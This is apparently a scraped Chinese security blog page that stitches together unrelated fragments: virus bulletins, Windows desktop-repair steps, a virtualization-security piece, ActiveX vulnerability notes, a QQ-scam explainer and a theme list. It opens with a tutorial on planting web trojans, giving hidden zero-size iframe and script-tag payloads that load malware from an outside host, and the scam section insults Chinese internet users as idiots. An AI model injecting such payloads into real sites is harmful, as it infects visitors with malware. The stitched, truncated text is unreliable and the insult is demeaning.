1、挂马的N种方法
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.arthack.org/horse.js></script> ,horse里的js写法一般为 document.write(’http:\/\/www.arthack.org\
ArtHacker今日提醒您注意:在今天的病毒中Worm/Kolabc.au“克莱客”变种au和Trojan/Obfuscated.qvk“小迷糊”变种qvk值得关注。
病毒名称:Worm/Kolabc.au
中 文 名:“克莱客”变种au
病毒长度:368128字节
病毒类型:蠕虫
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
Worm/Kolabc.au“克莱客”变种au是“克莱客”蠕虫家族的最新成员之一,采用高级语言编写,并经过添加保护壳处理。“克莱客”变种au运行 后,自我复制到被感染计算机系统的“%SystemRoot%\system32”目录下,重命名为“schrars.exe”。自我添加为系统服务,实 现蠕虫开机自动运行。在后台秘密收集被感染计算机的系统名称、用户账号等敏感信息,并提交到骇客指定的服务器上。在被感染计算机的后台连接骇客指定站点, 下载大量的恶意程序并在被感染计算机上自动运行。所下载的恶意程序可能包含网游木马、恶意广告程序、后门等,给用户带来不同程度的损失。与骇客指定的服务 器站点建立网络连接,骇客可通过“克莱客”变种au远程控制被感染的计算机,可执行的恶意操作包括:文件操作,进程操作,注册表操作,服务操作,屏幕监 控,键盘记录,摄像头抓图,命令操作等,给用户的计算机安全和个人隐私,甚至商业机密造成严重威胁。另外,“克莱客”变种au还具有自我删除的功能,以便 消除痕迹。
有时候,当我们用杀毒软件清除完病毒和木马之后,Windows桌面就会自动消失,通常是由于下面三种情况导致的。①explorer.exe损坏或丢失:②注册表键值被修 改;③由于程序冲突,病毒劫持等原因explorer.exe无法运行。我们可以通过下面的方法来解决这些问题。
第一步:尝试进入安全模式,如果安全模式下桌面显示正常,则很可能是程序或驱动冲突造成的问题,只要减少系统启动的项目通常就可以恢复。比如杀毒软件,更换显卡驱动等等。
第二步:如果没有桌面,可以按Ctrl+Shifl+Alt,打开“任务管理器”,点击“文件→新建任务”,输入“regedit”,打开注册表编辑 器。依次展开HKEY_LOCAL_MACHINE /SOFTWARE/Microsoft/WindowsNT/currentVersion/Winlogonl,将shell的键值修改为 Exploter.exe。依次展开 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Image/File/Execution/Options],确认其下没有“explorer.exe”项,如有则删除。
第三步:重启后,如果还未能加载桌面,则再次打开“任务管理器”,“新建任务”explorer.exe或者%systemroot%system32dllcacheexplorer.exe
第四步:如果还是未能显示桌面,可以用任务管理器运行打开杀毒软件,查看日志是否已经将explorer.exe文件被隔离,如被隔离则恢复即可(不过恢复时可能会释放病毒)。然后重复第三步。
第五步:如加载dllcache下的explorer.exe可以成功,可以复制该文件到Windows文件夹下即可。如果提示无权眼或拒绝访问,可以将时间向前调整一个月后重启即可。
第六步:如果上面的方法仍然不能解决问题,可以用Wlndows PE光盘,然后替换Windows及dllcache文件夹下的explorer.exe文件。然后再进行恢复。
目前流行的一些木马会修改用户系统的EXE COM 执行文件关联,使系统不能正常执行所有的程序,特别是一些杀毒软件清除病毒后,没有修复关联直接让系统不能执行任何EXE程序。
木马专家已经内置了自动监控修复执行程序关联的功能,当你系统执行程序关联被破坏,请按下面的方法操作。
1、打开系统文件名扩展名的查看
进入我的电脑 菜单里面选择 工具 文件夹选项
去除以下选项
虚拟化存在安全威胁
服务器虚拟化给人一种势不可挡的感觉。市场调研公司IDC预测,到2011年底这个市场的平均年增长率为27%,全球销售额预计将达到35亿美元。
需要注意的是,虚拟技术可能成黑客的帮手。如果企业一味扩大虚拟化产品,而对虚拟机与物理服务器的本质区别熟视无睹的话,那么他们迟早会给入侵者开辟新的方便之门,使之顺利进入到数据中心。业界目前还无法精准地确定这类威胁的本质,因为它们尚未切实发生过。
一位安全高手表示:虚拟化技术存在安全漏洞,这在VMware和AMD公司的产品中都曾出现过。另外,黑客还可以利用虚拟化技术来隐藏病毒、特洛伊木马及其他各种恶意软件的踪迹。
有专家表示:在虚拟化的新一代数据中心基础设施中,每款虚拟设备及其系统和网段都必须根据最佳实践进行管理和控制。这些实践应包括:
1、为所有虚拟机及各类型虚拟机上运行的所有应有程序建立黄金标准,应用安全及版本和补丁管理控制。
ArtHack今日提醒您注意:在今天的病毒中TrojanSpy.Pophot.ff“焦点间谍”变种ff和Rootkit.Clbd.c“彩带”变种c值得关注。
病毒名称:TrojanSpy.Pophot.ff
中 文 名:“焦点间谍”变种ff
病毒长度:121344字节
病毒类型:间谍类木马
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
TrojanSpy.Pophot.ff“焦点间谍”变种ff是“焦点间谍”木马家族的最新成员之一,采用Delphi编写,由其它木马程序释放出来的木 马功能组件,一般被注入到“EXPLORER.EXE”进程中加载运行,隐藏病毒程序,躲避安全软件的查杀。“焦点间谍”变种ff运行后,强行篡改被感染 计算机上的系统时间,致使某些安全软件失效。在被感染的计算机上搜索与安全相关的软件,一旦发现便强行将其关闭,大大降低了被感染计算机上的安全性。在后 台连接骇客指定的服务器,下载恶意程序并在被感染计算机上自动调用运行。其中,所下载的恶意程序可能包含网游木马、恶意广告程序、后门等,给用户带来不同 程度的危害。另外,“焦点间谍”变种ff还会在各个盘符根目录下创建“autorun.inf”文件以及木马程序文件“auto.exe”,实现双击盘符 启动病毒运行的目的。
ArtHack今日提醒您注意:在今天的病毒中Trojan/Pakes.aye“小偷派克斯”变种aye和Trojan/Puper.aao“小狗”变种aao值得关注。
病毒名称:Trojan/Pakes.aye
中 文 名:“小偷派克斯”变种aye
病毒长度:109056字节
病毒类型:木马
危害等级:★
影响平台:Win 9X/ME/NT/2000/XP/2003
Trojan/Pakes.aye“小偷派克斯”变种aye是“小偷派克斯”木马家族的最新成员之一,采用VC++编写,并经过添加保护壳处理。“小偷派 克斯”变种aye运行后,自我复制到被感染计算机系统的“%SystemRoot%\system32\”目录下并重新命名为 “lphcpodj0eg11.exe”。将自身添加为启动项,实现木马开机自动运行。在“%SystemRoot%\system32\”目录下释放图 片“phcpodj0eg11.bmp”并替换系统的当前桌面。在相同目录下释放屏保程序“blphcpodj0eg11.scr”并运行,该屏保伪装成 系统的蓝屏错误。连接骇客指定站点,下载恶意程序,所下载的恶意程序可能包含网游木马、广告程序、后门等,给用户带来不同程度的损失。另外,“小偷派克斯 ”变种aye安装完毕后会自我删除。
一、事件分析:
近日,网上曝光了一个Microsoft Access Oday漏洞。电脑上安装了Microsoft Access的用户如果浏览到黑客精心构造的网页木马,将会自动下载木马并保存到系统的启动目录内。目前,网络上已经有相关利用代码流传,超级巡警团队建 议大家使用临时解决方案封堵漏洞,并安装畅游巡警来应对网页木马的威胁。
影响版本:Microsoft Office Access 2000
Microsoft Office Access 2002
Microsoft Office Access 2003
Snapshot Viewer for Microsoft Access
不受影响的版本:Microsoft Office Access 2007
漏洞分析:Microsoft Office Access的Snapshot Viewer ActiveX控件可以让你从网络上打开一个Access的文件,但是不用安装一个标准的Access软件。由于没有对网络上的URL地址和本地保存路径 做检查,导致可以保存网络上的文件到本地任意一个位置,如启动目录。
网页木马截图:
受影响系统:
悠视网 UUSee网络电视 2008
描述:
——————————————————————————–
BUGTRAQ ID: 29963
UUSee网络电视2008是悠视网提供的一款全新网络电视收看软件。
UUSee网络电视2008在安装的时候注册了几个ActiveX控件控件,其中一个控件用于升级UUSee。该控件clssid为: {2CACD7BB-1C59-4BBB-8E81-6E83F82C813B},对应dll:C:\PROGRA~1\COMMON~1\uusee \UUUPGR~1.OCX。由于UUUpgrade.ocx没有对升级文件的来源进行验证,导致恶意攻击者可以通过构造伪造的升级文件导致UUSee网 络电视下载攻击者指定的文件并运行。目前这个漏洞正在被名为Exploit.Win32.UuSee.gen的木马积极地利用。
<*来源:cnfuzzer (cnfuzzer@hotmail.com)
链接:http://tieba.baidu.com/f?kz=411097036
现在网络诈骗的形式越来越多,日前义乌出现一骗子使用黑客程序破解用户密码,然后冒名顶替向事主的QQ好友借钱,“朋友在QQ里发来短信要4000元急用,看看视频里的确是本人,于是我就寄钱了”,钟女士没想到这却是一个网络新骗局。
我们来解析下黑客是如何实施诈骗的。
首先黑客通过各种渠道(比如入侵网站后挂木马、提供带病毒的文件下载等等)盗取了用户的QQ密码,狡猾的黑客这个时候是不会修改你的QQ密码的,接下来会用另外一个QQ号码,一般是冒充天真无知的女孩来加你,然后借机跟你视频,当你看到对面是个漂亮的女人的时候可千万别美,你已经被人算计了。其实跟你视频的根本就不是女人,而你的照片早已被黑客录制下来,有可能你看到的女人也是黑客早已录制的。接下来黑客会修改掉你的QQ密码,然后就是冒充你在你的QQ好友里寻找诈骗的目标。前面提到的钟女士就是一个很好的例子。
其实黑客的伎俩并不高,只是中国的网民,90%的是白痴(我实话实说),除了玩玩游戏、逗下女孩我想他们没什么在行的。对于这样的人我并不会因为他们被骗而感到遗憾,不客气的说你早该被骗了。这个世界上从来没有强者同情弱者这回事。花钱买教训吧!
Wordpress Theme – Falkner
Blurbia Premium WordPress Themes
Premium WP Theme – Technologic
Feature Pitch Theme
WordPress Theme – Photo Graphic
Premium Wordpress Theme – Triumph
Premium Wordpress Theme – Bloom
